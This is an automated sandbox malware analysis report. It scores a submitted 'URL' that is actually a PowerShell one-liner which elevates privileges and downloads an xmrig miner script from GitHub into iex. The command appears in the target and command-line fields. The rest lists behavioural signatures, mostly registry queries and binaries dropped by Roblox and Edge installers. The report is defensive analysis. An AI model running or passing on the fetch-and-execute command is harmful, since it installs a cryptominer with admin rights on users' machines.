Malware Analysis Report

2025-03-15 00:52

Sample ID 240626-3kbkbazhjc
Target http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Tags
defense_evasion discovery evasion persistence privilege_escalation trojan
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery evasion persistence privilege_escalation trojan

Event Triggered Execution: Image File Execution Options Injection

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Event Triggered Execution: Component Object Model Hijacking

Checks computer location settings

Drops desktop.ini file(s)

Checks installed software on the system

Checks whether UAC is enabled

Checks system information in the registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of NtCreateThreadExHideFromDebugger

Drops file in Windows directory

Drops file in Program Files directory

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

System policy modification

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 23:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 23:33

Reported

2024-06-26 23:44

Platform

win10-20240404-en

Max time kernel

600s

Max time network

600s

Command Line

"C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"

Signatures

Downloads MZ/PE file

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini C:\Windows\System32\bcastdvr.exe N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
